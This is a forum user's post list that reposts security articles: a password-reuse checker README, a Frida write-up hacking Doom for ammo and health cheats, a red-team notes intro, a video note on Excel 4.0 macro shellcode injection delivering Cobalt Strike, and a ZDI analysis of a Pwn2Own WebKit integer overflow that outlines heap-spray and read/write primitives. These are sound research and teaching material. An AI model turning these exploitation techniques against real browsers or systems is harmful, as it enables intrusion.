Everything posted by Nytro

  1. PAF Credentials Checker

PCC's aim is to provide a high-performing offline tool to easily assess which users are vulnerable to Password Reuse Attacks (a.k.a. Password Stuffing). The output of this tool is usually used to communicate with the vulnerable users and force them to change their password to one that has not leaked online.

Feature Highlights
- Only checks the password of internal users matching the IDs in external lists
- Highly parallel checking of credentials (defaults to 30 goroutines)
- Supports mixed internal hashing functions, useful if you have multiple hashing schemes
- Easy to extend with your own internal hashing schemes

Getting Started

If you have a working Go environment, building the tool after cloning this repository should be as easy as running:

go build

The tool can then be launched using this command:

./paf-credentials-checker -creds credentials.txt -outfile cracked.txt leak1.txt [leak2.txt [leakN.txt ...]]

You can find some test cases in the test_files directory. The different files on the command line are:
- credentials.txt contains your internal credentials, with one record per line following this syntax: internalID0:internalID1:mappingID:hashtype:hash[:salt[:salt[:...]]]. internalID0 and internalID1 are internal identifiers that will be written to the output file. mappingID is an ID that will be used to map the internal user to the external password lists. hashtype is the short hash type that corresponds to the hashing function that should be used to parse the hash and salts and to check the credentials. hash and salts are in the format required by the checking and extracting functions. For example, a record for an unsalted MD5 hash of "password" could look like: 1001:jdoe:ab12cd:MD5:5f4dcc3b5aa765d61d8327deb882cf99
- cracked.txt is a CSV file in which each password reuse match will appear as a row containing the internalID0,internalID1 of the matched user. This file is written live, so it will contain duplicates if your leak files contain duplicates.
- leak.txt is a file in the usual combo list format: mappingID:password

Note: usually the mappingIDs in combo lists are usernames, emails or other fields containing PII. To avoid processing and storing such extremely sensitive information, a script is available in the importer directory to recreate the combo list files and replace the mappingID with a heavily truncated MD5 sum (by default the first 6 characters of the hex output). Applying the same function to your internal mappingIDs will allow the matching logic to keep working. Please note that using a truncated hash that short will likely create some false positives (e.g. an internal user being matched to an external one that is not the same), but:
- this is expected; we want collisions to happen in order to limit the sensitivity of the information
- if there is a full false positive (e.g. an internal user matched to a different external one that somehow had the same password), then the internal user probably used an extremely common password, so it's not a bad idea to ask them to change their password too.

Supported hashing functions

In this initial release, only two functions are implemented to showcase the different functionalities.

Short ID | Verbose ID | Function
MD5 | MD5RAW | md5(password)
MD5spSHA1sp | MD5SaltPreSHA1SaltPre | md5(salt1.UPPER(HEX(sha1(salt2.password))))
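To make the nested MD5spSHA1sp construction concrete, here is a minimal sketch of the same computation in JavaScript (Node's crypto module). This is only an illustration of the algorithm; the tool itself implements it in Go:

const crypto = require('crypto');

// md5(salt1 . UPPER(HEX(sha1(salt2 . password))))
function md5spSha1sp(password, salt1, salt2) {
    const inner = crypto.createHash('sha1')
        .update(salt2 + password)
        .digest('hex')
        .toUpperCase();
    return crypto.createHash('md5').update(salt1 + inner).digest('hex');
}

A stored hash would then be compared against md5spSha1sp(candidatePassword, salt1, salt2) for each candidate password pulled from the leak files.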
Adding a new hashing function

Here is a todo list for adding a new hashing function:
- Decide on a Short ID, used in your internal credentials file, and a Verbose ID, only used within the tool.
- Add the Verbose ID to the const list at line 14 in credentialChecker.go.
- Add a case in the detectHash function in extractHash.go to map the Short ID to the Verbose ID.
- Create your extraction function in extractHash.go. The purpose of the extraction function is to parse the line from the internal credentials file, from the hashtype field until the end, and to create a new Hash object containing the proper hashtype (Verbose ID), hash and salts values.
- Add a case in the extractTokens function to map your Verbose ID to your new extraction function.
- Create your checking function in checkHash.go. The purpose of this function is to check a clear-text password against the Hash object that was extracted in the previous step.
- Add a case with the Verbose ID in the crackHash function in credentialChecker.go to map it to your new checking function.
- Add new unit tests to verify that your extraction and checking functions work accordingly.

Motivation

While comparing users' passwords against known weak passwords is a best practice, using a massive list containing all the leaked passwords is impractical if you have a lot of users and a strong hashing function, and it is also really bad from a user-experience point of view, as users will struggle to find a password that didn't appear in any breach. However, relying on a more realistic blacklist of around 10,000 passwords will protect users against attackers spraying bad passwords at scale, but it will not help them if they are reusing their password on another website that has suffered a breach. In this scenario, an attacker would just need to get those credentials from the third-party website's leak and test them on your website. If the user used the same password on both services, even if it was a strong password, their account would be at immediate risk of compromise. This attack scenario, called Password Stuffing or a Password Reuse Attack, has been trendy for several years as more and more massive data leaks happen.

This tool aims to fill this gap by allowing you to:
- Flag accounts that have been reusing the same set of credentials internally and on leaked websites
- Easily extend the tool to implement your own internal hashing function

This tool maps IDs from the internal list to IDs in the external lists so that only credentials belonging to internal users are checked for password reuse, avoiding the pitfalls mentioned above. It is also highly parallel thanks to Go's goroutines (by default it creates 30 computing threads, tunable in the code).

License

This project is licensed under the 3-Clause BSD License - see the LICENSE.md file for details.

Sursa: https://github.com/kindredgroup/paf-credentials-checker
  2. Hacking doom for fun, health and ammo

Reading time ~19 min. Posted by leon on 27 November 2019. Categories: Doom, Frida, Games, Reversing, Sensecon 2019, Reverse engineering

Remember iddqd and idkfa? Those two strings were etched into my brain at a very young age, where fond memories of playing shareware Doom live. For SenseCon '19, Lauren and Reino joined me as we dove into some reversing of chocolate-doom with the aim of recreating similar cheats. The results? Well, a video of it is shown below. We managed to get cheats working that would:
- Increment your ammo instead of decrementing it.
- Increment everyone's health by the amount it would have gone down. Yes, you read right, everyone.
- Toggle cheats just like how they behaved in classic Doom.

The source code for our cheats lives here if you want to play along, or maybe even contribute new ones.

The setup

The original Doom game was released in 1993, built for OSs a little different to what we have today. The chocolate-doom project exists and aims to be as historically correct as possible while still working on modern operating systems. Perfect nostalgia. We downloaded chocolate-doom for Windows from here, extracted it and sourced a shareware WAD to use.

We also set some rules for our project. The chocolate-doom source code is available; however, we did not want to reference it at all. Once extracted, chocolate-doom.exe was a stripped PE32 executable. This meant that reverse engineering efforts would be a little harder, but that was part of the challenge and the learning we wanted. Using tools such as IDA Freeware, CheatEngine and WinDbg was considered fair game, though. However, any patches or binary modifications had to be implemented using Frida, and not by manually patching chocolate-doom.exe.

Finding where to start – Windows

Sometimes, getting started is the hardest part. We decided to get a bit of a kick start by using CheatEngine to find interesting code paths based on the game's UI. First up was finding out what code was responsible for the ammo count. CheatEngine is a memory scanner and debugger that is particularly suited for this task. You can attach to a running process with CheatEngine and scan the process' memory to find all instances of a particular value. If our ammo count is currently 49, we can search for all instances of the value 49 in memory. There may, however, be quite a number of instances of this value within the process' memory – a scan will often return several. Additionally, not all instances will be related to the ammo count.

Searching for the value 49 returns several memory locations

To pinpoint exactly the right location, we can change the value a bit, and then rescan with CheatEngine for any instances of the previously found value that were altered by the same amount. We could do this by shooting the handgun a few times and taking note of by how much the ammo count changed. We can then use the "Next Scan" function and the "Decreased value by" scan type option to search in CheatEngine for a value that has also changed by the same amount. This decreased the number of possible locations for the ammo count to only three.

Only three possible locations found for the ammo count.

At this point, each of the possible instances could be either the original or a copy of the original ammo count. We can watch these memory locations to determine which instructions write to them, in an attempt to identify the code that is responsible for decreasing the ammo.
To do this in CheatEngine, you can simply right click a watched memory location and select "Find out what writes to this address".

Watching updates to a memory location.

When watching the first two locations we identified, we saw instructions rapidly writing to the target pointers even while the game was paused. These instructions also didn't subtract from the ammo count, which meant that they were probably not what we were looking for.

A rapid firing instruction on the watched memory location.

The third match only saw writes when the handgun was fired. The instruction was a subtraction by one and therefore likely the instruction to decrease the ammo count we were interested in. CheatEngine allows you to disassemble code around the identified instruction. Using this, we had the location of the instruction responsible for decreasing the ammo count when the handgun was shot: 0x0430A2C.

Instruction to reduce the handgun's ammo by 1

Finding where to start – Linux

While not the primary target for our project, we also had a go at patching the chocolate-doom ELF binary. This was all done on an Ubuntu machine using similar tools as mentioned above; however, CheatEngine was not available for Linux. Instead, to start finding interesting code paths in the ELF binary, we used a tool called scanmem, which is similar to CheatEngine but only gives the addresses of a value in memory and not which instruction alters it. After starting up scanmem and entering the changing ammo value a couple of times, it also isolated 3 possible addresses for ammo. These would change at each invocation of chocolate-doom because of the use of ASLR.

Scanmem showing the addresses storing the current ammo value.

To find out what instructions write to the identified pointers, we used gdb and set a watchpoint on each address found by scanmem.

Watch points set for the ammo decrease.

We then continued the game and shot once with the handgun to trigger a watchpoint. You can see the old and new ammo value below.

Watchpoint triggered after shooting with the handgun.

Next was to check where the instruction pointer was and to view the instructions surrounding it, to see if we could spot the exact instruction that subtracts one from the ammo value each time a shot is fired.

rip and the surrounding instructions

As you can see, there is a sub instruction just before where the instruction pointer is currently sitting. To search for the exact instruction in IDA, we viewed the hex value of the instruction in gdb.

Viewing the sub instruction in hex

Because the values are little endian, we searched for the opcodes 83 ac 83 a8 in IDA and had the offset location of the instruction responsible for decreasing the ammo count when the handgun was shot, i.e. 0x49F28.

Watching functions with Frida

With some target offsets at hand, we could start to watch them in real time with Frida. Frida has an Interceptor API that allows you to "intercept" function calls and execute code as a function prolog or epilog. One also has access to the arguments and the return value using the Interceptor, making it possible to log and, if needed, change these values. Given that we knew which instructions were writing to memory regions that contained the ammo value for our handgun, we used IDA to analyse the function around the instruction to find its entry point. This way we would know which memory address to use with the Interceptor.

Entrypoint into the function that affected the handgun's ammo

As you can see in the screenshot above, the function starts at 0x4309f0. With a base of 0x400000, that means that the function's offset is just 0x309f0 from that (this will be important later). With a known offset, our first Frida script started. This script would simply find the chocolate-doom module's base address, calculate the offset to the function we are interested in and attach the Interceptor. The Interceptor onEnter callback would then simply log that the function triggered.

Interceptor attached to the handgun fire function's entry point

We can see this script in action when attached to chocolate-doom below. Knowing that the function triggers as we fire the handgun helps confirm that we are on the right track. A minimal reconstruction of such a script is shown below.
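The original script is only shown as a screenshot in the post; a minimal sketch of what it does, with the script name and log message as assumptions of our own, could be:

// run with: frida chocolate-doom.exe -l watch_fire.js
const base = Module.findBaseAddress('chocolate-doom.exe');
const fireFunc = base.add(0x309f0); // entry point of the ammo-decrementing function

Interceptor.attach(fireFunc, {
    onEnter: function (args) {
        console.log('[+] handgun fire function triggered at ' + fireFunc);
    }
});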
Our first cheat

We figured we would start by writing a simple patch that just replaces the instruction decrementing the ammo count by 1 with NOP instructions. Frida has a code writer module that can help with this. The original decrement instruction was sub dword ptr [ebx+edx*4+0A4h], 1, which is represented as 8 opcode bytes when viewed in hex.

Hex opcodes for the instruction decrementing ammo of the handgun

The code writer could be used to patch 0x430a2c with exactly 8 NOP instructions using the putNopPadding(8) method on a code writer instance.

Frida code writer used to replace the ammo decrementing instructions with 8 NOPs.

Applying this patch meant that we no longer ran out of ammo with the handgun.

Improving the first ammo cheat

To test how effective our NOP-based cheat was, we used one of the original cheats ("idkfa") to get all of the available guns and ammo and see if it worked for those as well. Turns out, it didn't, and some investigation revealed that each gun had its own ammo-decrementing function. All functions eventually called an opcode that would SUB 0x1 from an ammo total (except for the machine gun, which would SUB 0x2). An improvement was necessary. We didn't want to hardcode all of the instructions we found and looked for other options. When searching in IDA for the opcodes 0x83 0xac (part of the ammo SUB opcodes for sub dword ptr [ebx+edx*4+0A4h], 1), we noticed that the only matches were those that formed part of functions that decremented ammo. Frida has a memory scanner, available as Memory.scanSync(), that we could use to match the locations of these functions dynamically (as 0x83 0xac). We then used the same Memory.patchCode() function to simply override the opcodes to ADD instead of SUB as a simple two-byte patch.

Ammo patcher to increment instead of decrement ammo for each matched opcode search

This patch was a little more generic and did not require any hardcoded offsets to work. Depending on what you are working with, a better approach may be to use some of the wildcarding features of Memory.scanSync() so that you can have much more specific matches. With our patch applied, all weapons now incremented their ammo count as you fired. A sketch of this scan-and-patch approach follows.
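Again, the actual patcher only appears as an image; a sketch of the scan-and-patch idea might look like the following. Note that the 0x83 0x84 ADD encoding is our own reconstruction of the "two-byte patch" (0x83 /0 is ADD with an imm8 operand, 0x83 /5 is SUB), not code lifted from the original script:

const mod = Process.getModuleByName('chocolate-doom.exe');

// every ammo decrement starts with 0x83 0xac (sub dword ptr [...], imm8)
Memory.scanSync(mod.base, mod.size, '83 ac').forEach(function (match) {
    Memory.patchCode(match.address, 2, function (code) {
        code.writeByteArray([0x83, 0x84]); // rewrite SUB to ADD, same operands
    });
});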
Writing a health cheat

After fiddling with ammo-related routines, we changed our focus to health. We used the same CheatEngine technique as before to figure out where our health was being stored and who was writing to those locations. Finding the health locations, however, turned out to be a bit more tricky, as around four to five different locations would appear between different searches. Some of these locations had rapid-firing instructions executing writes on them, as before with the ammo count, and were thus ignored. Around three locations had instructions which triggered when the player's health decreased.

The locations for the player's health.

The instructions were, however, not sub instructions, but rather mov instructions. Looking at the disassembled code, we could however spot the sub instruction a few lines higher up.

One of the sets of instructions that triggered when a player's health decreased. Note the sub instruction above the mov instruction, which did the actual subtraction.

What is important to note is that the instruction was a subtraction between two registers, i.e. sub eax, esi. This is a fairly common instruction, and it meant that we couldn't just scan for all instances of it in memory and replace them with an add instruction like we did with the ammo increment patch. Instead, we manually went to the location of each of the sub instructions and changed it to an add instruction. When viewed as opcodes, sub eax, esi is 0x29 0xF0, while add eax, esi is 0x01 0xF0. So, a patch was simply a case of swapping out the 0x29 for a 0x01. The sub instructions for the three different functions were at 0x3DEEC, 0x2C385, and 0x2C39. Patching 0x3DEEC however often caused the game to crash, so it was removed later on. Patching 0x2C385, and especially 0x2C39, made the player's health increase when attacked. It did however also have the side effect of making all monsters' health increase as well when they are attacked – this might be because both the player and monsters in the game use the same logic for health deduction. ¯\_(ツ)_/¯

Health patch to ADD instead of SUB

With this patch applied, the incrementing health cheat could be seen in the following video. A sketch of the fixed-offset patch is below.
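As before, the original patch only appears as an image; a sketch of the offset-based byte swap, keeping just the two offsets that worked reliably, might be:

const base = Module.findBaseAddress('chocolate-doom.exe');

// sub eax, esi (0x29 0xF0) -> add eax, esi (0x01 0xF0)
[0x2c385, 0x2c39].forEach(function (offset) {
    Memory.patchCode(base.add(offset), 1, function (code) {
        code.writeU8(0x01); // only the first opcode byte differs
    });
});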
Making our patches, cheats – static analysis

Up to now we had been patching chocolate-doom for our cheats as soon as Frida was injected and our scripts were run. We really wanted to make our cheats behave like the originals did, by simply typing them in the game, "iddqd" and "idkfa" style. To implement this, the chocolate-doom binary was analysed to find the logic that handles the current cheats. We knew that if you typed "idkfa", the game would pop up a message saying "VERY HAPPY AMMO ADDED".

Message after using the idkfa cheat

A text search in IDA for this message revealed the location where it was used.

Very Happy Ammo Added search in IDA

We focussed on the function this reference was in and realised that it was an incredibly long function. In fact, it appeared as though all of the cheats were processed by this single function, with a bunch of branches for each cheat. Code paths could be seen in the IDA graph view and gave us a reasonable idea of its complexity.

IDA graph view of the cheat function

All of the different cheat branches also made a call to a function that lived at 0x040FE90. This function took two arguments, one being a character array and the other an integer, and appeared to be comparing a character to a string.

Comparison function called for each cheat in the previous routine.

Making our patches, cheats – dynamic analysis

We decided to have a look at the invocation of this cheat comparison function (henceforth called cheat_compare) at runtime, dumping the arguments it receives. Just like we previously used the Frida Interceptor to attach to a function, we simply calculate the offset for cheat_compare and log the arguments it receives. This would also give us an opportunity to try and discover how to trigger this function in game. From IDA we knew the first argument was a character array, so we just dumped the raw string using the readCString() Frida method for that. For the second argument we weren't entirely sure what it would be, and left it raw for now.

Argument dumping using the Frida Interceptor for cheat_compare

With this script hooked, the results were rather… surprising… Every keypress the game received appeared to enter the identified compare function we called cheat_compare. Even arrow keys! In the video demo above, we slowly entered the cheat "iddqd", where you can see many of the possible cheats Doom has being compared to the hex value of the ASCII character we entered. Once the cheat matched, we moved Doom guy left a few times using an arrow key, which is where values such as 0xffffffac entered the routine for a bunch of possible cheats too. Without understanding the full cheat routine, we were sure these would never match something legitimate, so we suspected we may have found an optimisation opportunity here.

Making our patches, cheats – implementation

The two arguments cheat_compare was receiving were enough for us to start building our own implementation. In fact, receiving the keycodes entered was all we needed. We could have gone and tried to patch the original routine to match some new strings and trigger our patches, but instead we chose an easier way out. We can read the keycodes that cheat_compare received, perform some tests for our cheats and then let the original function continue as normal. Herein lies an important concept I suspect many don't immediately realise when using Frida. While Frida is a fantastic runtime instrumentation library, it can also be used to easily execute some JavaScript logic from within any function. In other words, we can introduce and execute code that was *not* part of the original binary, from within that binary. We don't have to patch some code to jump to opcodes we have written; no, we can just execute pure JavaScript.

The cheat_compare method, admittedly, was a little confusing. We decided to use the keycode we got as an argument, but had to work around the fact that we would receive the same keycode a number of times, as the method was repeatedly called for different cheats with the same keycode. As a result, we decided on simply recording unique keycodes. This introduced only one limitation; our cheats couldn't have repeating characters. The result was a method that would check a character and append it if it was unique, returning the full recorded buffer if a new character was added.

Method used to record keycodes received in cheat_compare()

Next, we attached to cheat_compare and fired this new getCheatFromBufWithChar() to get the buffer of characters that were entered thus far. If a buffer ended with one of our strings, we fired the relevant patch to activate the cheat! To optimise the routine a little, we exited early if the entered keycode was not in the ASCII printable range.

cheat_compare entrypoint used to match new, custom cheats

The result of this script meant that any unique ASCII characters that were read would be compared to toggle the status of a cheat. This also meant that we had to write smaller routines that would undo the patches we wrote, but those were relatively easy as we already knew the offsets and original opcodes. The final script to play with these cheats is available here; a sketch of the hook is shown after this paragraph.
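The real implementation lives in the linked repository; a simplified sketch of the hook, with the buffer recording inlined and the cheat strings and toggle functions as placeholders of our own, might be:

const base = Module.findBaseAddress('chocolate-doom.exe');
const cheatCompare = base.add(0xfe90); // 0x040FE90 - 0x400000

var buf = '';

function endsWith(s, suffix) {
    return s.slice(-suffix.length) === suffix;
}

Interceptor.attach(cheatCompare, {
    onEnter: function (args) {
        const key = args[1].toInt32();
        if (key < 0x20 || key > 0x7e) return;   // exit early on non-printable ASCII
        const ch = String.fromCharCode(key);
        if (buf.indexOf(ch) !== -1) return;     // only record unique keycodes
        buf += ch;
        if (endsWith(buf, 'gunz')) toggleAmmoCheat();    // placeholder cheat string
        if (endsWith(buf, 'healz')) toggleHealthCheat(); // placeholder cheat string
    }
});

Here toggleAmmoCheat() and toggleHealthCheat() would apply or undo the byte patches shown earlier, depending on the current cheat state. Note that, matching the limitation described above, the placeholder cheat strings contain no repeating characters.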
Conclusion

While choosing Doom may have been an easy target, we learnt a lot and got to play games while at it! We hope this inspires you to dig a little deeper into Frida and experiment more with it.

Sursa: https://sensepost.com/blog/2019/hacking-doom-for-fun-health-and-ammo/
  3. What is this?

These are my publicly accessible personal notes, at https://ired.team and https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques, about my pentesting / red teaming experiments in a controlled environment, involving various tools and techniques used by penetration testers, red teams and advanced adversaries.

{% hint style="warning" %} Do not take everything or anything for granted, nor expect the notes to be very detailed or to cover the techniques or the artifacts they produce in full, and always consult additional resources. {% endhint %}

The following sub-pages of this page explore some of the common offensive security techniques involving gaining code execution, lateral movement, persistence and more. This is my way of learning things - I learn by doing, repeating and taking notes. Most of these techniques were discovered by other security researchers and I do not claim their ownership. I try to reference the sources I use as best I can, but if you think I've missed something, please get in touch and I will fix it immediately.

The Goal

The goal of this project is simple - read other researchers' work, execute some common/uncommon attacking techniques in a lab environment and:
- understand how the attacks can be performed
- write code to further the understanding of some of the tools and techniques
- see what most common artifacts the techniques leave behind
- try out various industry tools and become more proficient in using them
- take notes for future reference

Social

Follow me on twitter: {% embed url="https://twitter.com/spotheplanet" %}

Sursa: https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques
  4. Colin Hardy

Here I describe how you can analyse a very stealthy technique to execute shellcode via process injection from an old-skool Excel macro technique, known as Excel 4.0 Macros. This seems to be a technique favoured by many APTs and red teams, given the lack of detection by lots of anti-malware technology. The sample attempts to inject shellcode which transpires to be a Cobalt Strike beacon that uses Domain Fronting to access its C2. The sample was provided by Arti Karahoda, definitely give him a follow: https://twitter.com/w1zzcap

The sample can be obtained from here: https://app.any.run/tasks/e8db83aa-89...

Also, I mention a few resources in the video, as follows:
https://outflank.nl/blog/2018/10/06/o...
https://d13ot9o61jdzpp.cloudfront.net...
http://www.hexacorn.com/blog/2015/12/...

Thanks for the sample Arti! Hope you all like the video and the techniques used, and hopefully this will help protect you in your own environments. If you liked the video, hit the thumbs up. If you loved it, please subscribe.

Find me:
https://twitter.com/cybercdh
https://colin.guru

Thanks! Colin
  5. Diving Deep Into a Pwn2Own Winning WebKit Bug

November 26, 2019 | Ziad Badawi

Pwn2Own Tokyo just completed, and it got me thinking about a WebKit bug used by the Fluoroacetate team (Amat Cama and Richard Zhu) at this year's Pwn2Own in Vancouver. It was part of the chain that earned them $55,000 and was a nifty piece of work. Since the holidays are coming up, I thought it would be a great time to do a deep dive into the bug and show the process I used for verifying their discovery. Let's start with the PoC.

First of all, we need to compile the affected WebKit version, which was Safari version 12.0.3 at the time of the springtime Pwn2Own 2019 contest. According to Apple's releases, this translates to revision 240322.

svn checkout -r 240322 https://svn.webkit.org/repository/webkit/trunk webkit_ga_asan

Let's compile it with AddressSanitizer (ASAN). This will allow us to detect memory corruption as soon as it happens.

ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/set-webkit-configuration --asan
ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/build-webkit # --jsc-only can be used here which should be enough

We are going to use lldb for debugging because it is already included with macOS. As the PoC does not include any rendering code, we can execute it using JavaScriptCore (JSC) only in lldb. For jsc to be executed in lldb, its binary file needs to be called instead of the script run-jsc. This file is available in WebKitBuild/Release/jsc, and an environment variable is required for it to run correctly. I should point out that:

env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release

can be run within lldb, but placing it in a text file and passing that to lldb -s is the preferred method.

ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt
env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release
r

Let's start debugging. It crashes at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8, which appears to be an out-of-bounds write. The stack trace shows that this occurs in the VM, meaning in compiled or JIT'ed code. We also notice that rsi, used as the index, contains 0x20000040. We have seen that number before in the PoC. It is the size of bigarr (minus one), which is essentially NUM_SPREAD_ARGS * sizeof(a). In order to see the JITed code, we can set the JSC_dumpDFGDisassembly environment variable so jsc dumps compiled code in DFG and FTL.

ZDIs-Mac:webkit_ga_asan zdi$ JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js

This will dump a lot of extraneous assembly. So, how are we going to pinpoint relevant code? We know that the crash happens at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8. Why don't we try searching for that address? It might lead to something relevant. Bingo! Right in the DFG. The NewArrayWithSpread node is emitted when creating a new array using the spread operator ... in the DFG JIT tier. This occurs in function f, which is generated by gen_func and called in a loop. The main reason for iterating ITERS times in f is to make that part of the code hot, causing it to be optimized by the DFG JIT tier. Digging through the source code, we find the function SpeculativeJIT::compileNewArrayWithSpread in Source/JavaScriptCore/dfg/DFGSpeculativeJIT.cpp. This is where the DFG emits code. Emitting code means writing the JIT-produced machine code into memory for later execution. We can understand that machine code by taking a look at compileNewArrayWithSpread.
We see that compileAllocateNewArrayWithSize() is responsible for allocating a new array with a certain size. Its third parameter, sizeGPR, is passed to emitAllocateButterfly() as its second argument, which means it will handle allocating a new butterfly, the memory space containing the values of a JS object, for the array. If you aren't familiar with the butterfly of a JSObject, more info may be found here. Jumping to emitAllocateButterfly(), we see that the size parameter sizeGPR is shifted 3 bits to the left (multiplied by 8) and then added to the constant sizeof(IndexingHeader). To make things simpler, we need to match the actual machine code to the C++ code we have in this function. The m_jit field is of type JITCompiler. DFG::JITCompiler is responsible for generating JIT code from the dataflow graph. It does so by delegating to the speculative & non-speculative JITs, which generate to a MacroAssembler (which the JITCompiler owns through an inheritance relationship). The JITCompiler holds references to information required during compilation, and also records information used in linking (e.g. a list of all calls to be linked). This means the calls you see, such as m_jit.move(), m_jit.add32(), etc., are functions that emit assembly. By tracking each one we will be able to match it with its C++ counterpart.

We configure lldb with our preference of Intel assembly, in addition to the malloc debugging feature for tracking memory allocations.

ZDIs-Mac:~ zdi$ cat ~/.lldbinit
settings set target.x86-disassembly-flavor intel
type format add --format hex long
type format add --format hex "unsigned long"
command script import lldb.macosx.heap
settings set target.env-vars DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib
settings set target.env-vars MallocStackLogging=1
settings set target.env-vars MallocScribble=1

Because a large size is being allocated with Guard Malloc enabled, we need to set another environment variable that will allow such an allocation.

ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt
env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release
env MALLOC_PERMIT_INSANE_REQUESTS=1
r

JSC_dumpDFGDisassembly will dump assembly in AT&T format, so we run disassemble -s 0x6400042d1c22 -c 70 to get it in Intel flavor, which will end up as the following. Let us try to match some code from emitAllocateButterfly(). Looking at the assembly listing, we can match the following.

It is time to see what the machine code is trying to do. We need to set a breakpoint there and see what is going on. To do that, we added a dbg() function to jsc.cpp before compilation. This helps a lot in breaking into JS code whenever we want. The compiler complained that exec in the EncodedJSValue JSC_HOST_CALL functionDbg(ExecState* exec) function was not used, so the build failed. To get around that, we just added exec->argumentCount();, which should not affect execution. Let's add dbg() here, because the actual NewArrayWithSpread function will be executed during the creation of bigarr. Running JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js again will dump the assembly and stop at the breakpoint. This breaks exactly before the creation of bigarr, and you can see the machine code for NewArrayWithSpread. Let us put a breakpoint on the start of the function and continue execution. The breakpoint is hit! Before stepping through, let's talk a little about what a JS object looks like in memory. describe() is a nice little function that only runs in jsc.
It shows us where a JS object is located in memory, its type, and a bit more, as displayed below. Notice how the arr_dbl object changes type from ArrayWithDouble to ArrayWithContiguous after adding an object. This is because its structure changed; it no longer stores only double values but multiple types.

A JS object is represented in memory as follows. Let's start with the arr array in the example above. By dumping the object address 0x1034b4320, we see two quadwords. The first is a JSCell and the second is the butterfly pointer. The JSCell consists of:

- StructureID m_structureID; # e.g. 0x5f (95) in the first quadword of the arr object (4 bytes)
- IndexingType m_indexingTypeAndMisc; # 0x05 (1 byte)
- JSType m_type; # 0x21 (1 byte)
- TypeInfo::InlineTypeFlags m_flags; # 0x8 (1 byte)
- CellState m_cellState; # 0x1 (1 byte)

The butterfly pointer points to the actual elements within the array. The values 1,2,3,4,6 are shown here starting with 0xffff, as this is how integers are represented in memory as a JSValue. If we go back 0x10 bytes, we see the array length, which is 5. Some objects do not have a butterfly, so their pointer is null or 0 as shown below. Their properties will be stored inline as displayed. The article links a small script for double-to-memory-address conversion and vice versa; a sketch of the idea follows.
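The linked script itself is not reproduced in the post; the standard typed-array trick it relies on looks like this (a sketch, treating addresses as [hi, lo] 32-bit pairs and assuming a little-endian host):

// a shared buffer lets us reinterpret the same 8 bytes as a double or two u32s
const conv = new ArrayBuffer(8);
const f64 = new Float64Array(conv);
const u32 = new Uint32Array(conv);

// [hi, lo] 32-bit pair -> double with the same bit pattern
function i2f(hi, lo) {
    u32[0] = lo;
    u32[1] = hi;
    return f64[0];
}

// double -> [hi, lo] 32-bit pair
function f2i(f) {
    f64[0] = f;
    return [u32[1], u32[0]];
}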
This was a short intro, but for more information and details on structures, butterflies, properties, boxing, unboxing and JS objects, check Saelo's awesome article and talk. In addition to that, check out LiveOverflow's great series on WebKit.

Let's continue stepping through the breakpoint. All right, so, what is going on here? Note this part from the PoC: the mk_arr function creates an array with the first argument as size and the second argument as elements. The size is (0x20000000 + 0x40) / 8 = 0x4000008, which creates an array of size 0x4000008 with element values of 0x4141414141410000. The i2f function converts an integer to a float so that it ends up with the expected value in memory; LiveOverflow explains it well in his WebKit series. Given that, we now know that rcx points to object a's butterfly - 0x10, because its size is at rcx + 8, which makes the butterfly rcx + 0x10. Going through the rest of this code, we see that r8, r10, rdi, r9, rbx, r12, and r13 all point to a copy of object a, eight copies to be specific, and edx keeps adding the sizes of each. Looking at edx, its value becomes 0x20000040. So, what are those eight copies of a? And what is the value 0x20000040? Looking back at the PoC, this means f becomes: f creates an array by spreading NUM_SPREAD_ARGS (8) copies of its first argument and a single copy of its second argument. f is called with objects a (8 * 0x04000008) and c (length 1). When NewArrayWithSpread gets called, it makes room for those 8 a's and 1 c. The last step-through shows the length of object c, which makes the final edx value 0x20000041. The next step should be the allocation of that length, which happens inside emitAllocateButterfly(). We notice the overflow that occurs at shl r8d, 0x3, where 0x20000041 gets wrapped around to 0x208 (0x20000041 * 8 = 0x100000208, truncated to 32 bits). The allocation size becomes 0x210 when it gets passed to emitAllocateVariableSized(). The out-of-bounds write access violation we see happens in the following snippet, on mov qword ptr [rcx + 8*rsi], r8. What this snippet does is iterate the newly created butterfly backwards with the incorrect size 0x20000041, while the real size is 0x210 after the overflow. It then zeros out each element, but since the actual size in memory is way smaller than 0x20000041, it reaches an out-of-bounds access violation in the ASAN build.

The Primitives

This might seem like just an integer overflow, but it is much more than that. When the allocation size wraps around, it becomes smaller than the initial value, thus enabling the creation of an undersized butterfly. This triggers a heap overflow later when data gets written to it, so other arrays in its vicinity get corrupted. We are planning on doing the following:

- Spray a bunch of arrays
- Write to bigarr in order to cause a heap overflow that will corrupt sprayed arrays
- Use corrupted arrays to achieve read (addrOf) / write (fake) to the heap using fake JS objects

The following snippet shows the spray. When f() is called, the integer overflow triggers when creating a butterfly with length 0x20000041, producing an undersized one because of the wraparound. However, 0x20000041 elements will be written nonetheless, leading to a heap overflow. When c is accessed, the defined getter of its first element will fire and fill up the spray array with 0x4000 elements of newly created arrays from the slice() call. The large number of butterflies created in spray and the huge length of bigarr's butterfly are bound to overlap at some point, because of the heap overflow and because butterflies are created in the same memory space. After executing the PoC in a non-ASAN release build, we get the following. We notice how the butterfly of one of spray's objects (which are either spray_arr or spray_arr2) towards the end was overlapped by bigarr. The following might help in visualizing what is going on.

